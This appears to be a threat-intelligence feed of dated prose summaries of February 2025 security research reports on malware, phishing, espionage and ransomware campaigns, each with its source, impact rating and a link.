Threat Research Feed

2025-02-15
Winnti_Group_Targeting_Japanese_Organisations
MEDIUM
Intel Source:
LAC Watch
Intel Name:
Winnti_Group_Targeting_Japanese_Organisations
Date of Scan:
2025-02-15
Impact:
MEDIUM
Summary:
LAC Watch researchers have uncovered a new attack campaign, dubbed RevivalStone, conducted by the Chinese threat actor Winnti group (also known as APT41) and targeting Japanese companies in the manufacturing, materials, and energy sectors. The campaign has been active since March 2024; the attackers exploit SQL injection vulnerabilities in ERP systems to gain initial access. They then install web shells such as China Chopper, Behinder, and the sqlmap file uploader, which allow them to move through the network, steal credentials, and gather intelligence. Once access is established, the attackers deploy an advanced version of the Winnti malware that uses AES and ChaCha20 encryption to secure its communications.
Source: https://www.lac.co.jp/lacwatch/report/20250213_004283.html
2025-02-15
Analyzing_DEEP_DRIVE
MEDIUM
Intel Source:
Securonix Threat Labs
Intel Name:
Analyzing_DEEP_DRIVE
Date of Scan:
2025-02-15
Impact:
MEDIUM
Summary:
Securonix researchers have identified an ongoing campaign called DEEP#DRIVE targeting South Korean businesses, government agencies and cryptocurrency users. The attackers use phishing emails carrying malicious attachments disguised as legitimate documents, such as work logs, insurance forms and crypto-related files, to trick victims into opening them. Once a user opens one of these files, an LNK file launches a PowerShell script that installs malware, which gathers system information and sends it back to the attackers through Dropbox. The lure files, often in .hwp, .xlsx or .pptx format, are hosted on Dropbox. Researchers attribute the campaign to Kimsuky, a North Korean APT group, based on its TTPs and its use of the same Dropbox technique in prior campaigns.
Source: https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/
2025-02-15
JavaScript_to_C2_Server_Malware
LOW
Intel Source:
CYFIRMA
Intel Name:
JavaScript_to_C2_Server_Malware
Date of Scan:
2025-02-15
Impact:
LOW
Summary:
Cyfirma researchers have analyzed a sophisticated multi-stage malware attack using obfuscation, steganography, and covert communication to bypass detection. It begins with a disguised JavaScript file that executes a PowerShell script, which downloads a malicious JPG image and text file containing hidden executables. These payloads deploy Stealer malware to steal sensitive data, including credentials and browser information. The stolen data is sent to a Telegram bot, allowing attackers to maintain persistence while evading traditional security measures. The attack's use of legitimate services, encryption, and multi-layered obfuscation makes detection and mitigation difficult.
Source: https://www.cyfirma.com/research/javascript-to-command-and-control-c2-server-malware/
2025-02-14
Fake_Media_Targets_German_Elections
LOW
Intel Source:
Recorded Future
Intel Name:
Fake_Media_Targets_German_Elections
Date of Scan:
2025-02-14
Impact:
LOW
Summary:
Researchers from Insikt Group have discovered ongoing Russian influence activities aimed at the German federal elections on February 23, 2025. These operations, linked to networks like Doppelgänger, Operation Overload, CopyCop, and Operation Undercut, seek to raise sociopolitical issues, alter public discourse, and undermine trust in democratic institutions.
Source: https://www.recordedfuture.com/research/stimmen-aus-moskau-russian-influence-operations-target-german-elections
2025-02-14
Fake_Etsy_Invoice_Scam
LOW
Intel Source:
MalwareBytes
Intel Name:
Fake_Etsy_Invoice_Scam
Date of Scan:
2025-02-14
Impact:
LOW
Summary:
Malwarebytes researchers have identified a phishing campaign in which cybercriminals target Etsy sellers. The campaign starts with phishing emails that contain a PDF invoice hosted on a legitimate Etsy domain (etsystatic.com). The PDF contains a link asking the seller to confirm their identity or verify their account. When the seller clicks the link, it redirects them to a fake Etsy login page designed to steal payment information, which the scammers can then use for fraudulent purchases or sell on the dark web.
Source: https://www.malwarebytes.com/blog/news/2025/02/fake-etsy-invoice-scam-tricks-sellers-into-sharing-credit-card-information
2025-02-13
REF7707_Campaign_Targeting_South_America
MEDIUM
Intel Source:
Elastic
Intel Name:
REF7707_Campaign_Targeting_South_America
Date of Scan:
2025-02-13
Impact:
MEDIUM
Summary:
Researchers from Elastic Security Labs have discovered a cyber espionage campaign, called REF7707, targeting the foreign ministry of a South American country. The campaign is linked to previous attacks in South Asian countries. The REF7707 attackers rely on advanced malware such as FINALDRAFT, GUIDLOADER and PATHLOADER, which are designed to infiltrate systems, execute malicious code and exfiltrate sensitive data. FINALDRAFT has both Windows and Linux versions and is capable of stealing data and injecting itself into other programs. The campaign's main tactic is the use of cloud services and third-party platforms for C2 communication.
Source: https://www.elastic.co/security-labs/fragile-web-ref7707
2025-02-13
The_BadPilot_Campaign
MEDIUM
Intel Source:
Microsoft
Intel Name:
The_BadPilot_Campaign
Date of Scan:
2025-02-13
Impact:
MEDIUM
Summary:
Microsoft researchers have uncovered a subgroup within the Russian state actor Seashell Blizzard that conducts cyberattacks globally, compromising internet-facing infrastructure to maintain long-term access to high-value targets. The subgroup has been active since 2021 and is known for stealthy persistence, credential theft and lateral movement within compromised networks. It targets critical sectors such as energy, oil and gas, telecommunications, shipping, arms manufacturing, and government institutions. It has leveraged published vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788) to gain initial access. The subgroup follows three primary tactics: targeted attacks using phishing and backdoors, opportunistic attacks exploiting vulnerabilities in internet-facing infrastructure to gain access, and hybrid attacks using supply-chain compromises.
Source: https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
2025-02-13
China_Espionage_Tools_Used_in_Ransomware_Attack
LOW
Intel Source:
Symantec
Intel Name:
China_Espionage_Tools_Used_in_Ransomware_Attack
Date of Scan:
2025-02-13
Impact:
LOW
Summary:
In late 2024, tools traditionally used by China-linked espionage groups were deployed in a ransomware attack against a South Asian software company. The attacker exploited a vulnerability in Palo Alto's PAN-OS firewall to gain access, steal cloud credentials, and encrypt the target's machines with RA World ransomware. Interestingly, the tools used were the same as those involved in previous espionage attacks, including the PlugX backdoor. This unusual blend of espionage tools with ransomware raises questions about whether China-linked actors are expanding into financially motivated attacks, a behavior typically seen in other nations like North Korea. The motives behind this shift remain unclear, but it suggests evolving tactics in cyber threats.
Source: https://www.security.com/threat-intelligence/chinese-espionage-ransomware
2025-02-12
Nigerian_Cybercriminals_Distributing_XLogger
LOW
Intel Source:
Cyberarmor
Intel Name:
Nigerian_Cybercriminals_Distributing_XLogger
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
Researchers from Cyberarmor have uncovered a malware campaign conducted by Nigerian cybercriminals that begins with collecting email addresses for malware distribution. The attackers start with email harvesting, gathering a list of potential victims through social media, dark web forums and Google dorking techniques to find publicly available email addresses. They then launch phishing campaigns from spoofed domains, using Gammadyne Mailer to send bulk emails while hiding their identity behind remote access tools. Once a recipient opens the infected attachment, the XLogger malware silently steals passwords and sensitive data from the system and sends the stolen data to the attacker's Telegram channel for further malicious activity.
Source: https://cyberarmor.tech/inside-a-malware-campaign-a-nigerian-hackers-perspective/
2025-02-12
StrelaStealer_Targeting_German_Speaking_Users
LOW
Intel Source:
Palo Alto
Intel Name:
StrelaStealer_Targeting_German_Speaking_Users
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
Recent StrelaStealer activity continues to use WebDAV servers, including a server referenced by its IP address, to host malware. As of February 10, 2025, decoy PDF files, which are non-malicious but contain a blurred image to mislead victims, are being used in the infection process. The malware is only triggered when the victim's Windows system has specific German language and locale settings (Austria, Germany, Liechtenstein, Luxembourg, Switzerland).
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-02-10-IOCs-for-StrelaStealer-activity.txt
2025-02-12
FCI_Job_Scam_Delivers_Xelera_Ransomware
LOW
Intel Source:
Seqrite
Intel Name:
FCI_Job_Scam_Delivers_Xelera_Ransomware
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
Seqrite researchers have recently uncovered multiple campaigns involving fake job descriptions targeting individuals applying for technical positions at the Food Corporation of India (FCI). The campaigns distribute a ransomware variant called Xelera, written in Python and packed with PyInstaller. On January 18, 2025, a malicious document named FCEI-job-notification.doc was found on VirusTotal, containing an embedded payload in OLE streams. The payload, named jobnotification2025.exe, executes ransomware tasks and other malicious actions on the target machine via a Discord bot. PyInstaller continues to be a popular tool for deploying Python-based malware in the wild.
Source: https://www.seqrite.com/blog/xelera-ransomware-fake-fci-job-offers/
2025-02-12
USB_Malware_Mines_Monero_in_South_Korea
LOW
Intel Source:
ASEC
Intel Name:
USB_Malware_Mines_Monero_in_South_Korea
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
ASEC researchers have discovered a case of cryptocurrency-mining malware spread via USB in South Korea. The malware, which mines Monero, uses PC resources without user consent. While mining itself isn't illegal, the unauthorized installation of mining software can be. The malware modifies system settings to optimize performance for mining, disables security measures like Windows Defender, and uses techniques like C&C communication through PostgreSQL and DLL sideloading to evade detection. The malware spreads rapidly via USB and generates significant profit, reportedly over 1 million won daily.
Source: https://asec.ahnlab.com/en/86221/
2025-02-12
NanoCore_RAT_Malware_Analysis
LOW
Intel Source:
malwr-analysis
Intel Name:
NanoCore_RAT_Malware_Analysis
Date of Scan:
2025-02-12
Impact:
LOW
Summary:
NanoCore is a remote access trojan used by cybercriminals for espionage, information stealing and taking control of compromised systems. It is customizable, allowing attackers to add features based on their requirements. The malware copies itself to a hidden folder and creates a registry entry so that it runs automatically. It connects to remote C2 servers from which attackers send commands to control the compromised system. It records keystrokes, takes screenshots and captures clipboard data, sending all of this stolen information back to the attacker.
Source: https://malwr-analysis.com/2025/02/10/nanocore-rat-malware-analysis/
2025-02-11
UAC0006_Targeting_Ukraine_Largest_Bank
LOW
Intel Source:
Cloudsek
Intel Name:
UAC0006_Targeting_Ukraine_Largest_Bank
Date of Scan:
2025-02-11
Impact:
LOW
Summary:
CloudSEK researchers have uncovered a phishing campaign conducted by the financially motivated threat group UAC-0006 targeting Ukraine's largest state-owned bank, PrivatBank. The attackers send phishing emails containing password-protected ZIP or RAR archives to trick victims into opening malicious files. These files run malicious JavaScript in the background, which triggers a hidden PowerShell command that downloads and installs the SmokeLoader malware. By chaining JavaScript, VBScript and PowerShell, UAC-0006 bypasses security detections and maintains long-term access to compromised systems.
Source: https://www.cloudsek.com/blog/getsmoked-uac-0006-returns-with-smokeloader-targeting-ukraines-largest-state-owned-bank
2025-02-10
Threat_Actors_Chained_Vulnerabilities_IvantiCSA
MEDIUM
Intel Source:
CISA
Intel Name:
Threat_Actors_Chained_Vulnerabilities_IvantiCSA
Date of Scan:
2025-02-10
Impact:
MEDIUM
Summary:
CISA and the FBI have issued a joint advisory regarding the exploitation of multiple vulnerabilities in Ivanti Cloud Service Appliances (CSA). Threat actors exploited CVE-2024-8963, CVE-2024-9379, CVE-2024-8190, and CVE-2024-9380 in September 2024 to gain initial access, execute remote code, steal credentials, and deploy webshells. These vulnerabilities were exploited in chained attacks targeting Ivanti CSA versions 4.6 (end-of-life) and certain 5.0.x versions. Exploits included administrative bypass, SQL injection, and command injection. Organizations using affected versions are urged to upgrade to the latest supported version and assume credentials stored on compromised appliances are exposed.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a
2025-02-10
Hunting_WebBased_Credit_Card_Skimmers
LOW
Intel Source:
gi7w0rm
Intel Name:
Hunting_WebBased_Credit_Card_Skimmers
Date of Scan:
2025-02-10
Impact:
LOW
Summary:
gi7w0rm explores techniques for detecting and analyzing web-based credit card skimmers—malicious scripts that target e-commerce websites to steal payment details during online transactions. The author explains how attackers exploit vulnerabilities or steal credentials to inject JavaScript that mimics legitimate payment forms, secretly capturing sensitive information. Tools like Urlscan.io, CyberChef, and Validin are highlighted for their effectiveness in identifying compromised websites and deobfuscating malicious code. A case study illustrates how a WordPress vulnerability was used to inject a skimmer that stole payment data by replacing authentic payment fields with fake ones.
Source: https://gi7w0rm.medium.com/a-beginner-s-guide-to-hunting-web-based-credit-card-skimmers-c820aeee87d6
2025-02-10
JMagic_Campaign
MEDIUM
Intel Source:
Black Lotus Labs
Intel Name:
JMagic_Campaign
Date of Scan:
2025-02-10
Impact:
MEDIUM
Summary:
Black Lotus Labs has uncovered a malware campaign, dubbed "J-magic," targeting Juniper enterprise-grade routers with a custom variant of the open-source backdoor tool, cd00r. This malware leverages "magic packets" to stealthily establish reverse shells on compromised devices, enabling attackers to exfiltrate data and maintain long-term access. Operating primarily in-memory, J-magic evades detection and takes advantage of routers' extended uptime and limited monitoring. The campaign, active from mid-2023 to at least mid-2024, has affected organizations across verticals like semiconductor, energy, and manufacturing, with a particular focus on routers serving as VPN gateways. While similarities exist with the SeaSpy malware, J-magic demonstrates advanced tradecraft with unique features such as an RSA challenge to secure remote access.
Source: https://blog.lumen.com/the-j-magic-show-magic-packets-and-where-to-find-them/
2025-02-09
NetSupport_RAT_Clickfix_Distribution
LOW
Intel Source:
ESentire
Intel Name:
NetSupport_RAT_Clickfix_Distribution
Date of Scan:
2025-02-09
Impact:
LOW
Summary:
eSentire researchers have observed an increase in attacks involving NetSupport RAT. The attackers use the ClickFix tactic to trick users into running a malicious PowerShell command: fake CAPTCHA verification pages on compromised websites instruct users to copy and execute specific commands that download and install the NetSupport RAT. The malware enables attackers to spy on victims in real time, take screenshots, record audio and video, and transfer files.
Source: https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
2025-02-09
Polymorphic_Python_Script_Avoids_Detection
LOW
Intel Source:
ISC.SANS
Intel Name:
Polymorphic_Python_Script_Avoids_Detection
Date of Scan:
2025-02-09
Impact:
LOW
Summary:
Researchers at ISC SANS have identified a malicious Python script that uses creative anti-debugging tactics to avoid inspection. The script employs multi-threading to conduct numerous evasion strategies concurrently, such as debugger detection, API hook analysis, memory integrity verification, and self-modifying code.
Source: https://isc.sans.edu/diary/rss/31658
2025-02-08
Mimic_Tax_Agencies_Targets_Financial_Entities
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Mimic_Tax_Agencies_Targets_Financial_Entities
Date of Scan:
2025-02-08
Impact:
MEDIUM
Summary:
Proofpoint researchers have uncovered a phishing campaign in which threat actors target financial organizations and individuals worldwide to take advantage of the tax-filing period. They send phishing emails impersonating legitimate tax agencies and services such as HM Revenue & Customs (HMRC) in the UK, Intuit in the US and myGov in Australia. The emails use tax-related themes such as overdue payments, tax refunds and account updates to trick people into opening them. They either lead victims to fake websites that harvest their credentials or carry malicious attachments that install malware such as Rhadamanthys on their systems.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-account?utm_source=social_organic&utm_social_network=twitter&utm_campaign=2025&utm_post_id=ea59ad2c-af76-4242-9e8d-3947e3db8856
2025-02-08
Fake_Cisco_Ad_Spreads_NetSupport_RAT
LOW
Intel Source:
Malwarebytes
Intel Name:
Fake_Cisco_Ad_Spreads_NetSupport_RAT
Date of Scan:
2025-02-08
Impact:
LOW
Summary:
Researchers at Malwarebytes have found a malicious campaign that used Google ads to spread a fake Cisco AnyConnect installer containing the NetSupport RAT. Threat actors copied a German university's website, not to deceive people directly, but to avoid ad detection systems. Users who searched for Cisco AnyConnect were routed to a fake Cisco copycat website that hosted the malware.
Source: https://www.malwarebytes.com/blog/news/2025/02/university-site-cloned-to-evade-ad-detection-distributes-fake-cisco-installer
2025-02-08
MacOS_Flexible_Ferret
MEDIUM
Intel Source:
SentinelLabs
Intel Name:
MacOS_Flexible_Ferret
Date of Scan:
2025-02-08
Impact:
MEDIUM
Summary:
Researchers from SentinelLabs have identified a new macOS malware called FlexibleFerret that evades Apple's XProtect detection tool. The malware is linked to the North Korean campaign known as Contagious Interview, in which attackers use deceptive tactics to lure job seekers into installing malicious software posing as tools such as VCam or Camera Access. FlexibleFerret is delivered through a malicious Apple installer package whose components work together to execute the malware, allowing the attackers to steal information from or gain control over infected macOS systems.
Source: https://www.sentinelone.com/blog/macos-flexibleferret-further-variants-of-dprk-malware-family-unearthed/
2025-02-08
10K_WordPressSites_Delivering_Malware
MEDIUM
Intel Source:
c/side
Intel Name:
10K_WordPressSites_Delivering_Malware
Date of Scan:
2025-02-08
Impact:
MEDIUM
Summary:
Over 10,000 WordPress websites have been compromised to deliver malware targeting both macOS and Windows users. Attackers inject a malicious JavaScript file into outdated WordPress sites, generating fake Google browser update pages via an iframe. This campaign delivers AMOS (Atomic macOS Stealer) for Apple users and SocGholish for Windows users—malware previously thought to be distributed by separate groups. The infection spreads through vulnerable WordPress plugins, making detection difficult.
Source: https://cside.dev/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware
2025-02-08
XE_Group_Exploits_VeraCore_Flaws
LOW
Intel Source:
Intezer
Intel Name:
XE_Group_Exploits_VeraCore_Flaws
Date of Scan:
2025-02-08
Impact:
LOW
Summary:
Researchers at Intezer have found that XE Group, a sophisticated cybercrime group operating since 2013, has shifted its techniques from credit card skimming to targeted information theft. Their most recent actions involve exploiting two zero-day vulnerabilities in VeraCore software (CVE-2024-57968, CVSS 9.9, and CVE-2025-25181, CVSS 5.8) to build webshells and keep persistent access to affected computers.
Source: https://intezer.com/blog/research/xe-group-exploiting-zero-days/
2025-02-08
APT_37_Targeting_K_Messenger
LOW
Intel Source:
Genians
Intel Name:
APT_37_Targeting_K_Messenger
Date of Scan:
2025-02-08
Impact:
LOW
Summary:
Researchers from Genians have uncovered APT37 (also known as ScarCruft or Reaper) targeting a group chat platform called K messenger to spread malicious LNK files. The files are hidden inside ZIP archives and given deceptive names, such as "Changes in Chinese Government's North Korea Policy.zip", to trick victims into opening them. Once the victim clicks the LNK file, it silently executes a hidden PowerShell command that triggers a chain of infections, eventually installing the RokRAT malware, which can steal data, take screenshots and run commands on the compromised system.
Source: https://www.genians.co.kr/blog/threat_intelligence/k-messenger
2025-02-07
FLESH_STEALER
LOW
Intel Source:
Cyfirma
Intel Name:
FLESH_STEALER
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Cyfirma researchers have uncovered Flesh Stealer, a malware designed to steal sensitive information from compromised systems. It was developed by a Russian-speaking individual and includes features such as anti-debugging and anti-VM capabilities. The malware first appeared in August 2024 and has been promoted on platforms such as Discord and Telegram and on underground forums such as Pyrex Guru. Flesh Stealer primarily targets popular web browsers such as Chrome, Firefox, Opera and Edge to steal stored credentials, cookies and browsing history.
Source: https://www.cyfirma.com/research/flesh-stealer-unmasking-the-blue-masked-thief/
2025-02-07
Hugging_Face_Malware_Threat
LOW
Intel Source:
Reversing Labs
Intel Name:
Hugging_Face_Malware_Threat
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers at ReversingLabs have found a novel approach used by threat actors to distribute malware via the Hugging Face platform by abusing Pickle file serialization. Pickle, a popular Python module for serializing ML model data, is risky because it permits arbitrary code execution during deserialization. Despite previous warnings highlighting this concern, it remains popular due to its ease of use.
Source: https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face
2025-02-07
Attackers_Targeting_Govt_and_Education_Entities
LOW
Intel Source:
Hunt.IO
Intel Name:
Attackers_Targeting_Govt_and_Education_Entities
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers from Hunt.IO identified a threat group named GreenSpot that has been active since 2007. The group is believed to operate from Taiwan and primarily targets government, academic and military-related organisations in China. It uses phishing tactics, creating fake websites that resemble legitimate email services such as Netease Mail to trick users into entering their credentials. When users enter their credentials on these fake sites, the attackers steal the login details and gain unauthorized access to the accounts.
Source: https://hunt.io/blog/greenspot-apt-targets-163com-fake-downloads-spoofing
2025-02-07
Stealthy_Malware_Bypasses_Chrome_Encryption
LOW
Intel Source:
Cyble
Intel Name:
Stealthy_Malware_Bypasses_Chrome_Encryption
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers from Cyble have found stealthy malware that can bypass Chrome's App-Bound Encryption via a dual injection tactic. The malware is deployed as a ZIP archive containing an LNK file disguised as a PDF and an XML project file disguised as a PNG, and is aimed at Vietnamese enterprises, notably those in the telemarketing or sales sectors.
Source: https://cyble.com/blog/dual-injection-undermines-chromes-encryption/
2025-02-07
StealingSeconds_WebsiteSkimmers
MEDIUM
Intel Source:
JScrambler
Intel Name:
StealingSeconds_WebsiteSkimmers
Date of Scan:
2025-02-07
Impact:
MEDIUM
Summary:
A recent investigation uncovered a web skimming attack affecting multiple websites, including Casio UK’s online store. The attack, exploiting vulnerabilities in Magento-based web stores, involved a two-stage skimmer that harvested sensitive customer data through an elaborate fake checkout process. Unlike typical skimmers that target only checkout pages, this one operated on all pages except the final checkout step, capturing personal and payment details before redirecting users to the legitimate page. The stolen data was encrypted and sent to a Russian-hosted server, suggesting an organized cybercriminal operation. Casio UK had a Content Security Policy (CSP) in place, but its ineffective configuration failed to prevent the attack.
Source: https://jscrambler.com/blog/stealing-seconds-web-skimmer-compromises-websites
2025-02-07
ClickFix_Tactics_in_DarkGate_Campaigns
LOW
Intel Source:
Malwarebytes
Intel Name:
ClickFix_Tactics_in_DarkGate_Campaigns
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers at Malwarebytes have discovered a new DarkGate malvertising operation that uses both the "ClickFix" approach and standard file downloads. ClickFix uses bogus CAPTCHA or traffic validation sites to entice visitors to paste and execute code, whereas previous techniques rely on malware-laden installers. This operation, which targets the Notion brand using malicious Google advertisements, indicates that threat actors are likely watching conversion metrics to see which strategy results in more effective malware infections.
Source: http://malwarebytes.com/blog/news/2025/01/clickfix-vs-traditional-download-in-new-darkgate-campaign
2025-02-07
KimsukyGroup_Using_RDP_Wrapper
MEDIUM
Intel Source:
ASEC
Intel Name:
KimsukyGroup_Using_RDP_Wrapper
Date of Scan:
2025-02-07
Impact:
MEDIUM
Summary:
The Kimsuky cyber threat group continues to conduct spear-phishing attacks, distributing malware disguised as document files to gain control of targeted systems. Their attacks leverage malicious shortcut files (*.LNK) that execute PowerShell commands to install malware such as the PebbleDash backdoor and a custom RDP Wrapper, which enables remote access. The group also employs proxy tools to bypass network restrictions, keyloggers to capture user inputs, and information-stealing malware that extracts credentials from web browsers. Recent attacks indicate a shift towards remote control tools rather than backdoors.
Source: https://asec.ahnlab.com/en/86098/
2025-02-07
Abyss_Locker_Ransomware
MEDIUM
Intel Source:
Sygnia
Intel Name:
Abyss_Locker_Ransomware
Date of Scan:
2025-02-07
Impact:
MEDIUM
Summary:
Sygnia researchers have identified a new ransomware group, dubbed Abyss Locker, that emerged in 2023 and continued its attacks in 2024, leveraging ransomware to cripple victims. The group targets critical infrastructure such as VPN appliances, network-attached storage (NAS) devices and ESXi servers to establish a foothold within the victim's network. It begins its attacks by exploiting vulnerabilities in unpatched VPN appliances to gain initial access, including a known vulnerability (CVE-2021-20038) in SonicWall VPN devices. After compromising the devices and the network, the group deploys ransomware to encrypt the data.
Source: https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/
2025-02-06
ValleyRAT_Targets_Financial_Organizations
LOW
Intel Source:
Morphisec Labs
Intel Name:
ValleyRAT_Targets_Financial_Organizations
Date of Scan:
2025-02-06
Impact:
LOW
Summary:
Morphisec Labs researchers discovered a campaign distributing the ValleyRAT malware, linked to the Silver Fox APT group. The campaign specifically targets the finance and accounting departments of organisations. The attackers use phishing websites to distribute the malware: one, https[://]anizom[.]com/, lures users into downloading a fake Chrome browser, while another impersonates a Chinese telecom company called Karlos and delivers malicious files. When users extract and run these files, the malware requests elevated privileges to gain administrative access to the system.
Source: https://www.morphisec.com/blog/rat-race-valleyrat-malware-china/?utm_content=323764605&utm_medium=social&utm_source=twitter&hss_channel=tw-2965779277
2025-02-06
ReverseEngineering_of_ELF_SshdinjectorAtr
MEDIUM
Intel Source:
Fortiguard Labs
Intel Name:
ReverseEngineering_of_ELF_SshdinjectorAtr
Date of Scan:
2025-02-06
Impact:
MEDIUM
Summary:
FortiGuard Labs analyzed ELF/Sshdinjector.A!tr, a Linux-based malware targeting network appliances and IoT devices for data exfiltration. Linked to the DaggerFly espionage group and the Lunar Peek campaign, the malware injects itself into the SSH daemon, maintaining persistence through infected binaries and communicating with a remote command-and-control (C2) server. Researchers reverse-engineered its components using Radare2 and AI-assisted analysis via r2ai. While AI provided efficient summaries and readable source code, it also introduced errors such as hallucinations, exaggerations, and omissions, underscoring the need for human oversight.
Source: https://www.fortinet.com/blog/threat-research/analyzing-elf-sshdinjector-with-a-human-and-artificial-analyst
2025-02-06
NetflixThemed_Survey_Phishing_Campaign
MEDIUM
Intel Source:
Unit 42
Intel Name:
NetflixThemed_Survey_Phishing_Campaign
Date of Scan:
2025-02-06
Impact:
MEDIUM
Summary:
Unit 42 identified a recent phishing campaign exploiting fake Netflix-themed surveys to steal credit card information. The scam lures users into completing a survey, which then redirects them to a fraudulent payment page requesting credit card details. Users who provide their information are sent to a fake "winner" page, while those who ignore the survey are redirected to another scam site after two minutes. The campaign's domain showed increased activity in December 2024 and January 2025, likely tied to this phishing operation.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-02-03-IOCs-for-Netflix-themed-survey-phishing-campaign.txt
2025-02-04
AsyncRAT_Abusing_Python_and_TryCloudflare
LOW
Intel Source:
ForcePoint
Intel Name:
AsyncRAT_Abusing_Python_and_TryCloudflare
Date of Scan:
2025-02-04
Impact:
LOW
Summary:
Forcepoint Labs have uncovered a new AsyncRAT malware campaign abusing TryCloudflare and malicious Python packages. The attackers use phishing emails containing a Dropbox link that downloads a ZIP file holding a .url file. The .url file redirects to an .lnk file, which executes JavaScript that downloads the AsyncRAT malware, giving attackers full control over the compromised system.
Source: https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware
2025-02-03
Operation_Phantom_Circuit
MEDIUM
Intel Source:
SecurityScorecard
Intel Name:
Operation_Phantom_Circuit
Date of Scan:
2025-02-03
Impact:
MEDIUM
Summary:
In December 2024, the North Korea-linked Lazarus Group launched "Operation Phantom Circuit," a sophisticated cyberattack targeting cryptocurrency and technology developers worldwide. By embedding malware into trusted development tools, the group compromised over 1,500 systems across multiple attack waves. STRIKE’s investigation revealed an elaborate infrastructure involving proxy servers in Hasan, Russia, command-and-control servers, and persistent remote access sessions to exfiltrate sensitive data. Attackers employed VPNs and commercial proxy networks to obfuscate their origins, routing traffic through Russian-based Oculus Proxy nodes before reaching their command centers. The stolen data—including credentials, authentication tokens, and system configurations—was ultimately stored on Dropbox.
Source: https://securityscorecard.com/blog/operation-phantom-circuit-north-koreas-global-data-exfiltration-campaign/
2025-02-03
High_Profile_Account_Targeting_on_Twitter
LOW
+
Intel Source:
SentinelOne
Intel Name:
High_Profile_Account_Targeting_on_Twitter
Date of Scan:
2025-02-03
Impact:
LOW
Summary:
Researchers from SentinelLabs have uncovered a phishing campaign that hijacks X (formerly Twitter) accounts for fraudulent activity. The attackers target high-profile accounts belonging to U.S. political figures, international journalists, X employees, cryptocurrency organizations and others, with the aim of stealing money from unsuspecting followers. The campaign uses two lures: emails reporting a fake account login, and copyright-violation warnings, both designed to trick users into clicking malicious links. Once the attackers take over an account they immediately lock it and begin posting fraudulent cryptocurrency investment opportunities for financial gain.
Source: https://www.sentinelone.com/labs/phishing-on-x-high-profile-account-targeting-campaign-returns/
2025-02-02
New_Aquabotv3_Malware_Targets_Mitel_SIP_Phones
LOW
+
Intel Source:
Akamai
Intel Name:
New_Aquabotv3_Malware_Targets_Mitel_SIP_Phones
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Akamai researchers have discovered Aquabotv3, a new variant of the Mirai-based Aquabot malware. This variant targets Mitel SIP phones by exploiting CVE-2024-41710, a command injection vulnerability. The new version introduces a unique function, report_kill, which notifies the command and control (C2) server when a kill signal is detected on the infected device. As of the latest update, no response from the C2 has been observed.
Source: https://www.akamai.com/blog/security-research/2025-january-new-aquabot-mirai-variant-exploiting-mitel-phones
2025-02-02
CL_STA_0048_Targeting_South_Asia
LOW
+
Intel Source:
Palo Alto
Intel Name:
CL_STA_0048_Targeting_South_Asia
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Researchers at Palo Alto Networks have discovered an espionage effort known as CL-STA-0048 that targeted high-value entities in South Asia, including a telecommunications corporation. The attackers used uncommon approaches such as Hex Staging for payload delivery, DNS exfiltration via ping, and SQLcmd misuse for data theft. Based on the methods, tools, infrastructure, and victimology, the activity is believed to originate in China with moderate-high confidence.
Source: https://unit42.paloaltonetworks.com/espionage-campaign-targets-south-asian-entities/
2025-02-02
Lumma_Stealer_GitHub_Based_Delivery
LOW
+
Intel Source:
Trend Micro
Intel Name:
Lumma_Stealer_GitHub_Based_Delivery
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Trend Micro researchers have discovered a sophisticated campaign distributing Lumma Stealer malware via GitHub's release infrastructure. The attackers exploited GitHub as a trusted platform to deliver the malware, which then deployed additional threats like SectopRAT, Vidar, Cobeacon, and another Lumma Stealer variant. The campaign shows ties to the Stargazer Goblin group, known for using compromised websites and GitHub repositories to distribute malicious payloads, highlighting the group's evolving tactics.
Source: https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html
2025-02-02
Malicious_Domains_Impersonate_Tax_Agencies
LOW
+
Intel Source:
Proofpoint
Intel Name:
Malicious_Domains_Impersonate_Tax_Agencies
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Researchers at Proofpoint have detected a rise in scams and malicious websites mimicking tax agencies and financial companies, coinciding with tax season in the United Kingdom and the United States. Attackers have used tax-related topics to spoof government agencies and financial institutions, attempting to trick users into engaging with fake information.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-account
2025-02-02
Windows_Locker_Ransomware_Insight
LOW
+
Intel Source:
Cyfirma
Intel Name:
Windows_Locker_Ransomware_Insight
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Researchers at CYFIRMA have discovered a new ransomware called "Windows Locker," which encrypts victims' files and appends the .winlocker extension. On infection it drops a ransom note named Readme.txt instructing victims to contact the attacker, or an "authorized administrator", for payment and decryption. The malware, written in .NET, first appeared in December 2024 and has since been widely distributed via GitHub.
Source: https://www.cyfirma.com/research/windows-locker-ransomware/
2025-02-01
Clipboard_Hijacker_Delivers_Lumma_Stealer
LOW
+
